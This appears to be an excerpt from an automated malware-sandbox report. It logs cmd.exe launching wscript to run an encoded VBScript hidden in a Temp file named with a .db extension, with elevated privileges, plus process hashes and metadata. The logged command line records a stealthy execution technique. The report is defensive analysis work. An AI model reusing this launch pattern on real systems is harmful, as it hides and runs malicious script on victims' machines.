                      Chronological Activities

                      Analysis Process: cmd.exe PID: 2480 Parent PID: 1388

                      General

                      Start time:14:10:48
                      Start date:16/03/2021
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:'C:\WINDOWS\system32\cmd.exe' /c start wscript /e:VBScript.Encode C:\Users\user\AppData\Local\Temp\SysinfY2X.db
                      Imagebase:0x4a7c0000
                      File size:345088 bytes
                      MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      Chronological Activities

                      Analysis Process: wscript.exe PID: 1616 Parent PID: 2480

                      General

                      Start time:14:10:48
                      Start date:16/03/2021
                      Path:C:\Windows\System32\wscript.exe
                      Wow64 process (32bit):false
                      Commandline:wscript /e:VBScript.Encode C:\Users\user\AppData\Local\Temp\SysinfY2X.db
                      Imagebase:0xffc50000
                      File size:168960 bytes
                      MD5 hash:045451FA238A75305CC26AC982472367
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      Chronological Activities

                      Disassembly

                      Code Analysis

                      Reset < >